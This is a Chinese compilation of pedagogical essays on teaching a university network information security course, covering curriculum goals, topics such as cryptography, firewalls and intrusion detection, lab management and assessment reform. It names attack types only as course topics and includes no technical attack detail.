《网络信息安全》课程

2024-05-12

《网络信息安全》课程(精选十篇)

《网络信息安全》课程 篇1

信息与网络安全, 一直是人们热衷讨论的话题, 随着互联网的广泛普及, 计算机网络平台被广泛应用于电子商务、金融、教育等多个领域, 如何保证计算机网络的正常工作, 保证个人、企业和国家的信息不被泄露, 是人们必须考虑的问题。可以说, 随着信息化的深入, 人们越来越深刻地意识到网络信息安全的重要性。高校是人才培养的摇篮, 信息与网络安全相关课程的开设顺应了新时代发展的信息化需求。

2. 网络安全的课程特点

网络安全作为一门综合性学科, 涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科。该课程不仅涵盖数学、通信、计算机等自然科学, 还涉及法律、心理学等社会科学。网络安全的问题不仅仅涉及技术因素, 还涉及管理因素, 不仅有自然因素, 也有人为因素, 不仅有外部的安全威胁, 也面临内部的安全隐患[1,2]。因此, 网络安全这门课程有如下特点:

(1) 技术更新快。网络安全基于计算机网络, 网络攻击手段更是层出不穷, 如何有效方法网络攻击, 是一直被研究的课题。课程的设置也应该根据当代社会网络安全现状, 与时俱进。

(2) 实用操作性要求高。作为一门工科课程, 实验课是必备选项。离开了实践, 没有实际操作, 只有理论学习, 知识点过于空泛, 学生很难搭建一个完整的知识体系。而且相应的实践练习, 更利于促进学生了解基础的网络安全日常维护。

3. 网络安全的教学目标

基于网络安全课程的特点, 对于该门课程的学习, 面向对象不同, 制定的教学目标也应该有所区别。对于通信类专业学生来说, 前期已经具备一定的计算机网络基础和通信基础, 除了需要了解一些网络安全基本常识之外, 还需要了解和掌握网络安全的基础理论, 网络系统的安全维护, 搭建网络攻防体系系统架构, 能够独立处理与维护网络系统中的常见问题。学生只有具备一定的实践动手能力, 进入企业后, 才能“跑步上岗”, 迅速适应企业文化, 得到企业认可。

4. 网络安全的教学探索

(1) 教学方法多元化, 教学手段现代化。高校培养的是应用型人才, 基于设置的教学目标, 在教学方法上, 要实现多元化。在传统的讲授法的基础上, 结合案例法, 讨论法, 在系统地给学生讲授理论知识的同时, 迅速拉近与学生的距离, 活跃课堂气氛, 扩展学生思维。在讨论具体案例时可以采用分组的形式, 以小组为单位, 提炼观点, 不仅仅利于学生之间信息的交流, 实现思维碰撞, 同时为了后面实验教学进行分组实验奠定基础。例如通过虚拟机模拟演示密码破解, 可以结合日常生活应用, 如QQ被盗等真实案例, 让学生学有所得, 学有所思。在教学手段上, 目前, 多媒体技术已经被普遍应用于教学, 结合PPT的展示以及相关影像的播放, 可以将抽象的理论知识具体化, 让学生有更深刻更形象的体会, 也可以进一步的激发学生的学习热情。

(2) 课程教学与企业应用相结合。网络安全是一门实用性很强的学科, 市场对于网络安全方面人才的需求也是与日俱增, 具备扎实的网络安全相关技术对于学生的就业非常有利。同时由于网络技术的更新换代迅速, 相应的从业人员需要具备较强的自我学习与更新能力。因此, 在进行课堂教学时, 教师需要时刻关注网络安全技术的现状, 网络攻击技术的演进以及对应的网络防御手段的更新, 特别是企业所面临的网络安全挑战以及所需要的网络安全专业人才。在现代企业网络中, 面临的威胁主要来自以下三个方面:手提 (平板) 电脑或者手机等智能终端移动办公带来的安全风险;多平台和复杂应用带来的数据泄露风险;公司网络遭到黑客入侵或者病毒破坏带来的安全风险。

(3) 实验设计, 循序渐进。网络安全实验是锻炼学生动手能力的最佳途径, 实验也是为了让学生更深刻的了解网络安全相关理论。在实验设计上采用循序渐进的方式, 以项目法为基础, 采用让学生主动参与, 教师辅导的形式, 通过实验完成相应的小任务, 提高学生的自我认同度。实验的设计比较关键的是实验项目的选取, 要以教学内容为基础, 包含尽可能多的知识点, 同时又要激发学生的学习积极性。以大家都熟悉的校园网为例, 由于网络安全基于网络攻防体系, 因此学生对于相应的“攻”与“防”技术都比较感兴趣, 可以以校园网遭遇的网络攻击, 相应的防御技术, 以及平台设置等为主题, 拆分成小任务, 让学生以小组为单位, 各组员分工协作, 制定相关步骤, 得出实验结果, 提高实验报告并对相应结果进行分析, 教师整体把握学生的完成情况, 并适当的给予帮助。之后还可以通过拓展任务的方式让学生开拓思维, 在已完成的实验任务的基础上再自主选择是否继续, 并可以适当采用一些奖励机制, 提高学生的参与积极性。

5. 结束语

21世纪的社会是一个信息化, 全球化的社会, 计算机网络把全球的用户都连接在一起, 网络攻击和网络暴行也是层出不穷, 信息网络安全也成为国家发展所面临的一个重大问题。个人用户, 企业用户和国家, 对于自身的数据安全和信息安全都更加关注。因此, 市场对于网络安全的人才需求增长迅速。作为高校来说, 需要培养的是适应市场需求的应用型人才, 因此, 教师需要有针对性的进行教学, 设计合理的教学内容, 提高学生的学习积极性, 培养学生的网络安全意识, 提高学生的网络安全实用技能, 给学生创造更多的实际操作机会, 理论与实践相结合, 使学生具备基本的网络安全保障能力。

摘要:信息安全是一门综合性学科, 涉及多方面的理论和应用知识, 网络安全是信息安全的重要组成部分, 也是高校通信类专业学生必修课之一。本文作者结合教学实践, 对于如何培养学生网络安全意识, 激发学生学习积极性, 将课程理论与社会实践有效结合, 提高学生实践和动手操作能力作了初步探讨, 为使学生成为能够适应企业需求的复合型IT人才而努力。

关键词:信息安全,网络安全,高校,通信,复合型

参考文献

[1]周学广, 信息安全学[M].北京:机械工业出版社, 2008

[2]石志国, 薛为民, 尹浩, 计算机网络安全教程[M], 北京:清华大学出版社, 2011

《网络信息安全》课程 篇2

网络信息安全浅析

摘要:在当今社会,信息、物质、能源一起构成三大支柱资源,而其中的信息资源,对人们来说已不再陌生。随着社会的发展,信息越来越显得重要,信息是一种财富,对经济的繁荣、科技的进步,社会的发展都起着非常重要的作用。同样,对信息的保护也是一件很重要的工作。

关键词:信息资源;信息安全

1.网络信息安全概述

信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不可缺少的信息交换工具。然而,由于计算机网络具有开放性、互联性、连接方式的多样性及终端分布的不均匀性,再加上本身存在的技术弱点和人为的疏忽,致使网络易受计算机病毒、黑客或恶意软件的侵害。面对侵袭网络安全的种种威胁,必须考虑信息的安全这个至关重要的问题。

网络信息安全分为网络安全和信息安全两个层面。网络安全包括系统安全,即硬件平台、操作系统、应用软件;运行服务安全,即保证服务的连续性、高效率。信息安全则主要是指数据安全,包括数据加密、备份、程序等。

1.1 网络信息安全的内容

1.1.1 硬件安全。即网络硬件和存储媒体的安全。要保护这些硬设施不受损害,能够正常工作。

1.1.2 软件安全。即计算机及其网络中各种软件不被篡改或破坏,不被非法操作或误操作,功能不会失效。不被非法复制。

1.1.3 运行服务安全。即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测,发现不安全因素能及时报警并采取措施改变不安全状态,保障网络系统正常运行。

1.1.4 数据安全。即网络中存储及流通数据的安全。要保护网络中的数据不被篡改、非法增删、复制、解密、显示、使用等。它是保障网络安全最根本的目的。

2.1 网络信息安全的目标

2.1.1 保密性。保密性是指信息不泄露给非授权人,或供其使用的特性。

2.1.2 完整性。完整性是指信息未经授权不能被修改、不被破坏、不被插入、不迟延、不乱序和不丢失的特性。对网络信息安全进行攻击的最终目的就是破坏信息的完整性。

2.1.3 可用性。可用性是指合法用户访问并能按要求顺序使用信息的特性,即保证合法用户在需要时可以访问到信息。

2.1.4 可控性。可控性是指授权机构对信息的内容及传播具有控制的能力的特性,可以控制授权范围内的信息流向以及方式。

2.1.5 可审查性。在信息交流过程结束后,通信双方不能抵赖曾经做出的行为,也不能否认曾经接收到对方的信息。

2.我国信息化中的信息安全问题

近年来,随着国家宏观管理和支持力度的加强、信息安全技术产业化工作的继续进行、对国际信息安全事务的积极参与以及关于信息安全的法律建设环境日益完善等因素,我国在信息安全管理上的进展是迅速的。但是,由于我国的信息化建设起步较晚,相关体系不完善,法律法规不健全等诸多因素,我国的信息化仍然存在不安全问题。

2.1 信息与网络安全的防护能力较弱。我国的信息化建设发展迅速,各个企业纷纷设立自己的网站,特别是“政府上网工程”全面启动后,各级政府已陆续设立了自己的网站。但是由于许多网站没有防火墙设备、安全审计系统、入侵监测系统等防护设备,整个系统存在着相当大的信息安全隐患。根据有关报告称,在网络黑客攻击的国家中,中国是最大的受害国。

2.2 我国基础信息产业薄弱,核心技术严重依赖国外,缺乏自主创新产品,尤其是信息安全产品。我国信息网络所使用的网管设备和软件基本上来自国外,这使我国的网络安全性能大大减弱。被认为是易窥视和易打击的“玻璃网”。由于缺乏自主技术,我国的网络处于被窃听、干扰、监视和欺诈等多种信息安全威胁中,网络安全处于极脆弱的状态。

2.3 信息犯罪在我国有快速发展趋势。除了境外黑客对我国信息网络进行攻击,国内也有部分人利用系统漏洞进行网络犯罪,例如传播病毒、窃取他人网络银行账号密码等。

2.4 在研究开发、产业发展、人才培养、队伍建设等方面与迅速发展的形势极不适应。

由于我国的经济基础薄弱,在信息产业上的投入还是不足,特别是在核心技术及安全产品的开发生产上缺少有力的资金支持和自主创新意识。其次,全民信息安全意识淡薄,警惕性不高。大多数计算机用户都曾被病毒感染过,并且病毒的重复感染率相当高。

除此之外,我国目前信息技术领域的不安全局面,也与西方发达国家对我国的技术输出进行控制有关。

3.解决措施

针对我国网络信息安全存在的问题,要实现信息安全不但要靠先进的技术,还要有严格的法律法规和信息安全教育。

3.1 加强全民信息安全教育,提高警惕性。有效利用各种信息安全防护设备,保证个人的信息安全,提高整个系统的安全防护能力,从而促进整个系统的信息安全。

3.2 发展有自主知识产权的信息安全产业,加大信息产业投入。增强自主创新意识,加大核心技术的研发,尤其是信息安全产品,减小对国外产品的依赖程度。

3.3 创造良好的信息化安全支撑环境。完善我国信息安全的法规体系,制定相关的法律法规,加大对网络犯罪和信息犯罪的打击力度,对其进行严厉的惩处。

3.4 高度重视信息安全基础研究和人才的培养。为了在高技术环境下发展自主知识产权的信息安全产业,应大力培养信息安全专业人才,建立信息安全人才培养体系。

3.5 加强国际防范,创造良好的安全外部环境。必须积极参与国际合作,通过吸收和转化有关信息网络安全管理的国际法律规范,加强信息网络安全。

4、结束语

随着网络和计算机技术日新月异地飞速发展,新的安全问题不断产生和变化。因此网络信息的安全必须依靠不断创新的技术进步与应用、自身管理制度的不断完善和加强、网络工作人员素质的不断提高等措施来保障。同时要加快网络信息安全技术手段的研究和创新,从

《网络信息安全》课程 篇3

关键词:网络安全;教学改革;主动学习;任务驱动

一、引言

随着计算机网络的高速发展,人们对计算机网络的依赖性日益增强,越来越多的信息和重要数据资源存储和传输于网络当中,通过网络获取和交换信息的方式已成为当前最主要的信息沟通方式之一。计算机网络的使用平台涵盖了社会的各行各业,如电子商务、电子政务、网络银行等。然而,网络安全威胁也日益增多,黑客入侵、拒绝服务攻击(DoS)、分布式拒绝服务攻击(DDoS)以及计算机病毒的广泛传播使得网络安全技术成为了信息技术领域的重要研究课题。高等院校为了适应时代的发展,必须加强大学生对计算机网络安全技术的学习,培养出符合社会要求的新型网络安全方面的人才。

二、《网络信息安全》课程的教学目标

在现代信息化的社会当中,网络安全问题已成为各国政府普遍关注的问题。目前,国内的大部分高校都已开设了网络信息安全方面的课程。《网络信息安全》课程的目的,一方面是为了使学生掌握网络安全的基本原理以及保障网络安全的主要技术和方法,培养网络信息安全方面的专业全才;另一方面在于加强学生的网络安全意识,培养学生在实际工作和生活中解决一些网络安全问题的实用人才,使学生能够更好地满足社会和企业的基本要求。

《网络信息安全》课程的教学目标是使学生在已有的计算机原理和计算机网络原理等理论基础上,对网络信息安全方面的理论知识以及计算机网络安全系统有一个比较系统的、全面的了解。通过本课程的学习,使学生了解和掌握计算机网络信息安全的基本概念、基本原理和工作方式,了解设计和维护安全的网络及其应用系统的基本手段和常用方法,包括密码技术、IDS技术、网络攻击技术、PKI技术、常见的网络病毒与网络黑客的防范技术、实现安全服务的方法和策略以及如何构建一个网络安全体系。

三、《网络信息安全》课程的特点

《网络信息安全》是一门国家重点发展的新兴学科,它涉及到计算机、数学、通信、电子、物理、法律、教育等学科的交叉领域,它既可以说是附属于计算机学科,又可以说是一门独立的学科。《网络信息安全》这门课程注重理论与实践相互关联,其涉及的新技术、新概念、新问题以及新方法日新月异,发展极为迅猛。《网络信息安全》作为一门课程本身具有以下特点:

第一,知识覆盖面广,知识更新快。《网络信息安全》课程包括许多方面的理论知识:密码学、网络体系结构、防火墙、IDS(入侵检测技术)等,它又涉及到网络安全原理、网络安全标准、黑客入侵以及计算机病毒的防治等,范围非常广。与此同时,网络攻击手段与网络防范技术此消彼长,要想保证系统处于安全状态,必须要保证网络安全技术实时更新,才能更好地防患于未然。

第二,学生主体的多样性和复杂性。高校一般拥有计算机网络安全专业的学生和其他非计算机专业的学生,学习的主体具有多样性和复杂性的特点。计算机网络专业的学生是未来计算机网络安全维护的主要技术力量,需要深入理解、掌握并且能够熟练应用网络信息安全方面的知识。而非计算机专业的学生是面向社会的计算机实用性人才,一般而言只需要掌握计算机网络安全的基本知识,切实提高自身的网络安全意识。

第三,实践性强。学生要想掌握《网络信息安全》这门课程的基本原理和技术应用,不仅需要拥有良好的预备知识,例如计算机网络的基本原理、操作系统、数据通信等,还需要开展一定程度的实验课程。《网络信息安全》的课程不能离开实践,否则只能是纸上谈兵,让学生兴趣索然。例如防火墙的配置的实验,学生只有实际地动手操作,才能深刻地领会其工作原理,掌握其工作方式。

四、《网络信息安全》教学改革的探索

在新一轮的教学改革背景下,为了达到《网络信息安全》课程设置的目的,就必须改变传统的教学方法。针对《网络信息安全》课程的特点,必须在教学模式、教学手段、实验手段以及考核方式上进行变革。

1.教学模式的改革。在《网络信息安全》的课程当中,教师应该采用创新的教学模式,切实提高教学质量。在以往的传统教学模式中,教师常常“满堂灌”,学生只是被动地接受而缺乏主动地进行思考。因此,在《网络信息安全》的课程教学改革中,教师要积极推行启发式教学,在课堂上加强和学生的互动,充分调动学生的学习积极性,通过“启发式”、“互动式”、“案例式”以及“课堂提问”等形式,引导学生积极参与到课堂的教学当中,使学生积极主动地思考,提高学习质量。

2.教学手段的改革。《网络信息安全》这门课程中涉及的概念较为抽象,十分琐碎而又环环相扣,内容比较晦涩难懂,因此,教师必须采用一些现代化的教学手段,提高学生学习这门课的兴趣。针对计算机专业的学生和非计算机专业的学生,教师应选取不同的角度去阐述知识,划分不同的学习内容。随着计算机网络和多媒体技术的不断发展,教师可以充分利用多媒体和网络课程相结合的教学手段增强学生的感性认识和学习兴趣,利用幻灯片、动画、影片等更直观地呈现出所授的知识内容。这种教学手段有利于学生在有限的时间内学到更多的知识,能够实现以学生为中心的情景式教学方式,加强老师的教与学生的学的交流。在《网络信息安全》的教学过程中,教师应该尽量避免枯燥的文字解读,应多采用任务驱动法、案例法等进行实时教学。例如在教授关于黑客进行网络攻击的模块时,教师可以使用仿真黑客模拟工具的方法修改学生的计算机密码,让学生意识到网络安全的重要性,同时也使得课堂更富有实际意义。

3.实验手段的改革。高校首先需要对实验环境进行改进,《网络信息安全》的许多实践课程都需要在实验过程中才能更好地被学生所理解。因此,学校必须建立一个专门的计算机网络安全实验室,构建一个小型的局域网络,并且搭建专门的网络安全实验平台。其次,需要建立完善的实验室制度。《网络信息安全》的实验课程大都是对一些黑客软件的应用,由于黑客软件具有一定的攻击性,难以监控每一个学生的操作,所以在安排实验课程时要有严格的管理制度,要达到专人专机,建立严格的登记制度。对于黑客仿真软件的使用,教师要严格管理其使用过程,避免部分学生因为好奇心驱使而攻击一般网络。另外,高校可以在《网络信息安全》的实验教学中利用虚拟机技术来解决实验中所产生的网络安全问题。最后,高校可以在实验室中建立专用的安全工具资源数据库,以便于学生进行网络安全的自主学习和自由操作。

4.考核方式的改革。教师在设置《网络信息安全》课程的考核方式时,首先必须要明确大学教育的主要目标不是为了考试的高分,而是为了增强学生的各项技能,提高学生解决实际问题的能力,通过考核使学生对自己的能力有一个正确的认识,能够及时更正自己的学习方法和思维模式。针对《网络信息安全》这门课程的课程性质,教师应该以实际动手能力测验为主,以书面考试形式为辅进行综合测评考核。考核形式可以让学生通过团结合作或者分组讨论去完成一些网络安全维护的项目,将考核变成一个实际的操作任务,提高学生在处理网络安全问题时的能力,增加课程的学习乐趣,以此达到更好的学习效果。

五、结束语

随着社会的发展,信息安全技术必然会成为维护社会稳定的必要技术之一。因此,深入研究《网络信息安全》课程的改革方法,培养高素质、高能力的网络安全技术专才势在必行。《网络信息安全》课程的教学改革,不仅要提高学生对计算机网络安全的使用能力,而且要增加学生的社会竞争技能。针对不同需求的学生群体,高校应积极探索有效的方法对该课程进行改革,以此来加强网络安全课程的教学效果,提高课程教学质量,形成完整的计算机网络安全教学体系。

参考文献:

[1] 陈晓峰.浅析大学计算机网络安全课程教学改革[J].教育界,2013,(28).

[2] 黄剑华,马婷.信息安全课程教学模式的探索与创新[J].科技信息,2012,(13):226.

[3] 焦燕.高校计算机网络安全课程教学改革初探[J].管理学家,2014.

[4] 习军.高校计算机网络安全课程教学改革与探索[J].科学导报,2015.

[5] 尹少平.谈大学网络安全课程教学与实训[J].电脑知识与技术,2006,(20).

[6] 岳小菊.高职院校计算机网络安全课程教学改革探索[J].电脑开发与应用,2014,(1).

高职信息网络安全课程教学改革探索 篇4

随着人类进入信息网络社会, 信息网络系统在人类的日常生活、工作中发挥着越来越重要的作用。由于操作不当和网络黑客的猖獗, 大家对计算机中存储的信息安全越来越担心了。怎样才能使计算机与网络中的信息更安全, 必须了解计算机信息安全的概念, 了解经常遇到的各种信息安全问题和应对策略。

以为企事业单位第一线输送实用型人才[1]为办学宗旨的高等职业技术院校, 要适应社会发展、经济建设需求, 培养有一定的理论基础、扎实的实践动手能力和比较强的创新能力的实用型技术人才。针对工作在各行各业最前沿的高职计算机及相关专业的学生而言, 培养日常安全意识, 掌握信息安全相关技术已迫在眉睫。

为使学生能够具有良好的职业道德, 了解并认识各类计算机病毒、网络黑客攻击的危害性, 熟悉并初步掌握计算机网络侦查与信息安全管理等基本理论知识及相关实际操作及处理技能, 具有较强的信息安全应用处理能力, 能胜任各级企事业单位计算机信息管理及基本的安全维护, 具备规划企业安全方案的初步能力, 该文从明确课程教学目标、合理设计教学内容及如何提高教学质量三方面进行了一些改革探索。

2 明确课程教学目标

以培养学生实际动手、操作技能为核心目标, 理论知识的掌握应服务于实际工作能力的建构。所谓实际工作能力, 应当是一种对职业世界的理解和认同, 对职业任务的认识和把握, 对职业活动的控制与操作能力[2]。高职计算机及相关专业开设信息安全课程, 其目的是培养在实际生活和工作中能够解决第一线的具体信息安全问题的实用性人才, 而不是培养信息安全方面的全才, 也不是培养战略人才。即培养满足企事业单位社会需求, 具备一定的安全道德意识, 了解并熟练掌握信息网络安全维护及安全防范技能, 基本能够胜任信息安全系统环境构建的技能型的人才。

因此, 本门课程的教学目标是培养学生良好的职业道德素质;帮助学生了解并掌握信息网络安全的基本知识、原理和技术, 学会如何在开放的网络环境中保护自己的信息和数据, 防止黑客和病毒的侵害;重点学习目前在信息网络安全领域应用较多的技术, 主要是防火墙技术、入侵检测 (IDS) 技术和基于公钥基础设施 (PKI) 等信息安全技术, 使学生在完成本课程学习后, 能够独立进行网络信息安全方面的研究和工作;在学习并掌握信息网络安全知识的同时, 培养学生的创新精神、实践技能和创业能力, 并注重培养学生的认真负责的工作态度和一丝不苟的工作作风。

3 精心组织、设计教学内容

信息网络安全是一门综合性学科, 同时又是一门普及性意义的实践性很强的课程, 因高职学生的网络基础知识及所授教学课程学时所限, 全面介绍信息网络安全各方面的理论知识及相关技能是不可能的, 也毫无必要, 应有选择、有针对性地学习相关的信息安全知识。故信息网络安全课程的基本任务是让学生掌握密码学与信息安全基本的思想与方法, 为今后工作、生活及进一步学习与研究奠定坚实的基础。

根据高职计算机及相关专业学生, 在掌握信息网络安全基础理论知识及相关技能的前提下, 应尽可能多地了解当前的信息网络安全技术, 以增强实际分析与解决信息安全实际问题的能力。高职信息安全课程的教学内容至少应包括:

1) 网络安全概述:理解网络安全的基本概念和术语, 了解目前主要的网络安全问题和安全威胁, 理解基本的网络安全模型及功能, 了解信息网络安全的重要性及各种信息安全法律法规;

2) 网络操作系统命令及协议分析:需要掌握常用网络协议及协议分析工具, 各种网络服务及常用网络命令, 系统漏洞及后门等内容, 尤其是系统的安全配置, 这是信息网络安全的根基所在;

3) 防火墙技术与VPN技术:防火墙技术是一种隔离内部网和公众访问网的安全技术, 对两个通信网络执行访问控制, 而VPN则是一种跨越Internet进行安全的、点对点通信的安全虚拟通道技术;

4) 密码技术及应用:密码技术是保护信息安全的重要手段之一, 也是防止伪造、篡改信息的认证技术基础;课程中介绍密码学的基本概念, 要求准确理解并反复强化, 以形成对密码学整体的初步印象;而对密码学中的数学概念要求有一定的了解, 可以不必深入掌握, 留待以后加强;

5) 病毒及其防范:了解各种计算机病毒的原理、传播方式及其危害, 从而更好地杀毒、防毒;

6) 网络攻防和入侵检测:了解黑客与网络攻击、入侵检测的基本知识, 掌握口令攻击、端口扫描、网络监听、IP欺骗、拒绝服务、特洛伊木马等攻击方式的原理、方法及危害, 能够识别和防范各类攻击并利用入侵检测工具检测入侵行为;

7) 网络安全管理:理解网络管理的概念、目标、功能及标准, 熟悉一些管理软件的功能和应用。

在选择具体授课内容时, 应根据社会企事业及各方面需求及相关专业的学生作适当调整, 尤其不能流于表面而局限于一些泛泛的、缺乏全面的安全知识, 同时也不要过于追求一些深奥的、研究方面的理论知识。要根据所设定的适合高职学生的教学目标, 围绕着在实际生活、工作中可能遇到的一些信息安全问题, 精心设计相应的授课内容, 布置学习任务, 以便让学生能够将课堂所学知识同现实安全问题相联系, 能够根据出现的安全现象解决实际问题, 真正的将信息安全知识固化到自身, 最终达到开设本信息安全课程的目的。

4 提高教学质量的探索

明确教学目标, 规划好教学内容后, 还应配有良好的教学方法和手段, 如是才能真正产生好的教学效果。我们一方面按照现代教育思想[3]组织教学, 一方面积极探索, 大胆改革, 具体从以下几个方面进行探索:

4.1 完善信息安全理念, 认识维护信息网络安全的重要性

高职学生一般都有很强的好奇心, 对新知识充满浓厚的兴趣, 尤其一部分学生更是对黑客技术有着耳闻, 想进一步深入了解和掌握一些黑客攻击技术的迫切感。其实, 在Internent网上有很多的黑客攻击工具, 只要下载下来简单安装配置后就可能产生严重的攻击行为。例如, 漏洞扫描、网络监听等工具就是一把双刃剑。网络管理人员使用这些工具可以了解网络运行情况及现有网络存在的一些安全漏洞, 从而作出相应的安全防范措施;而一些怀有好奇心的人及黑客则可以利用这些工具扫描、监听甚至攻击相关网络, 从而造成有意或无意的网络攻击。因此, 我们在讲授信息安全课程的时候首先要让学生认识到网络攻击的危害性和维护信息网络安全的重要性。如何引导学生做一个信息安全卫士而不是一个安全文盲及黑客, 是本课程教学的一个重要任务。

在信息网络安全的第一节课, 首先给出一些CERT (Computer Emergency Response Team, 计算机紧急应变小组) 统计出的一些信息安全事件数据, 让学生初步认识到信息安全攻击事件的防不胜防和信息安全事件所带来的惨重损失;然后通过讲述一些国内外网络犯罪的事例, 使学生了解哪些网络行为是违法的, 进一步认识到维护信息安全和遵守信息安全法律法规的重要性;最后让学生明确信息网络安全存在着木桶效应:只有保证每个环节的安全, 信息网络安全才能有保障, 从而让学生一开始就养成严谨的信息安全理念。

4.2 启发式教学, 发挥学生的主观能动性

兴趣是最好的老师, 我们应该充分利用科学的教学方法来提高学生的学习兴趣, 培养学生的钻研精神, 增强学生学习的主观能动性。教学课堂上可以充分利用多媒体教学, 将图片、动画、录像等元素都集成到教学活动中, 以直观、生动的教学形式提高学生的学习兴趣。这样避免了单纯的理论说教, 让学生能够从抽象难懂的信息网络安全知识上升到形象上的认识。

教学过程中, 老师可以寻求学生的反馈, 打断讲课来提问, 一次中断十秒钟, 注视学生;有时老师可以和学生开些善意的玩笑, 允许他们提问, 发表评论, 并在对话中保持主动。这种教学无异于邀请学生围着饭桌相互交流[4]。

针对信息网络上出现的一些安全事件, 老师可以提出相应的问题 (例如网络支付中的身份识别和信息保密问题) , 鼓励学生独立分析问题和解决问题, 引导学生表达、倾听并能够主动回答问题、解决问题的能力, 从而养成学生积极思考、主动解决问题的习惯。另外, 应培养学生善于提出问题、积极主动地分析比较的习惯, 让他们每时每刻都带着问题去学, 并及时总结已学过的知识, 逐渐培养学生学习的主观能动性。

4.3 理论联系实际, 尽快掌握所学知识

密码技术及应用理论性强, 是本课程的重点、难点, 为使学生能够掌握密码学的基础理论, 教学过程中可以采用理论联系实际的教学方法。首先讲述密码学的基本概念和术语、对称和非对称密码的区别、古典密码学的基本方法及DES算法、RSA算法的基本原理, 使学生掌握密码学的基础知识, 简单了解加密算法的原理、设计思路及使用场所, 对加密算法产生初步印象;然后介绍密码学应用方面的知识, 包括密钥管理、消息认证、数字证书、以及Windows系统中的证书服务等方面的基本原理、方法和应用, 从而加深对密码学概念及各种应用的理解。

PGP, 全称Pretty Good Privacy, 一种在信息安全传输领域首选的加密软件, 其技术特性是采用了非对称的“公钥”和“私钥”加密体系。学习完非对称密钥理论知识后, 试着让学生各自动手安装PGP软件, 生成一对的“公钥”和“私钥”, 并让学生把自己的“公钥”发布给同班的同学, 让学生之间相互发送加密和签名的文件, 从而实现安全文件传输, 如此, 学生在实际操作过程中快速了解并掌握了非对称密钥体制的理论知识和实际使用方法。

4.4 遵循实践动手能力培养第一的原则, 培养学生较强的实践应变能力

信息安全是一个复杂的、隐蔽性很强的问题, 一般人很难发现[5]。开设信息网络安全课程的目的就是让学生能够从复杂的网络环境之后发现信息安全问题, 针对信息安全问题进行分析, 找到问题根源所在, 并能够及时解决所出现信息安全, 以便进一步培养学生具有敏锐的眼光、清晰的思路及解决信息安全问题的能力。从发现信息安全问题, 分析解决问题, 直至消除安全隐患, 时间越短越好, 以减少信息安全问题所带来的影响和损失。同时针对信息安全问题, 要透过现象看本质, 主动出击、防范, 不能等到问题爆发了, 造成严重损失了再解决。

“魔高一尺道高一丈”, 信息网络飞速发展, 病毒与黑客攻击技术日新月异, 高职学生应用“与时俱进”的思想面对信息安全问题, 在平时的工作学习中时刻了解信息安全动向, 关注各种新病毒:网络挂马、网络钓鱼、超级病毒工厂等, 不断学习, 接收最新信息安全技术及各种安全防范方法。

信息网络安全课是一门实际应用性很强的课程, 要以“必需、够用”为度, 淡化理论的片面推导过程, 应加强培养学生理论成果的实际应用能力, 注重课堂教学内容的精选和更新。在努力丰富课堂教学内容的同时, 必须加强学生善于总结、应对各种最新安全问题的能力。可以鼓励学生课余时间自己上网查找最新安全技术资料, 了解并掌握一些最新信息安全技术, 以小论文方式提交并进行适当考核, 这样提高了学生的自学能力、主动应变能力和文字表达能力, 为今后的工作学习打下坚实信息安全权基础。

4.5 良好团队合作精神, 善于与他人交流合作

高职计算机相关专业的学生一般工作在计算机应用的最前沿, 网上办公、网上事务处理、电子商务、电子政务等, 这改变了企事业单位的工作模式, 大大提高了工作效率, 在给工作带来极大便利的同时, 也带来了严重的信息安全挑战。信息网络安全问题面比较广, 参与讨论的人越多, 解决问题的速度就越快、越完美, 相应的安全漏洞也会越少, 共同探讨、争辩过程中, 甚至还会激发更多人的奇思妙想, 产生意想不到的效果。因此, 高职信息网络安全课程应积极培养学生之间交流沟通的能力, 平时鼓励学生多读、读懂信息安全方面的文章, 能把自己的想法写出来并在同学间实现共享;另外, 信息网络安全方面的问题往往不是某个学生单独能够解决的, 需要同学们共同参与解决, 这就需要学生具有良好的团队精神, 善于与他人交流合作, 集众人智慧, 共同探讨所遇到的信息安全问题。

当然, 高职计算机相关专业的学生在学习探讨各种信息安全问题的同时, 可以充分利用各种网络资源来学习充实自己, 例如可以经常上一些杀毒软件网站了解最新病毒信息, 从一些病毒案例分析解决中学习一些实际操作经验;同时可以注册清华大学 (水木清华) 、东南大学等高等院校的BBS论坛, 学习探讨一些信息安全问题。

5 结束语

高职信息网络安全课程是一门内容更新很快的课程, 更是一门具有较高挑战性的课程, 这势必给我们的信息安全教学工作带来一定的难度。该文在明确信息网络安全课程教学目标、精心安排设计教学内容以及如何提高教学质量方面进行了一些有益的尝试, 合理设计、组织好信息网络安全课程教学, 完善学生信息安全理念, 需要在以后的教学实践中进行不断的总结和提高。

摘要:信息网络给人们带来极大便利的同时, 也带来了严重的信息安全挑战。高职计算机相关专业的学生一般工作在计算机应用的最前沿, 很有必要全面开设信息网络安全课程。该文从明确课程教学目标、精心组织设计教学内容以及如何提高教学质量三方面进行了一些有益的尝试。合理设计、组织好信息网络安全课程教学, 完善学生信息安全理念, 需要在以后的教学实践中不断地改革探索。

关键词:信息网络安全,课程,教学方法

参考文献

[1]贾少华.面向市场面向学生、面向实践——试论高职人才培养的基本原则[J].西北工业大学学报 (社会科学版) , 2005 (1) .

[2]江铁.高职信息安全专业人才培养模式的研究[J].计算机教育, 2009 (2) .

[3]姬兴华《.现代教育思想》课程“导学”思路问题探析[M].淮北职业技术学院学报, 2010 (2) .

[4]Ken Bain.如何成为卓越的大学教师[M].明廷雄, 彭汉良, 译.北京大学出版社, 2008 (10) .

【企业网络】网络信息安全报告 篇5

一、实验目的及要求

该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。

本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。

二、专周内容

1、安全需求分析

(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:

A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理

(2)解决网络安全问题的一些要求

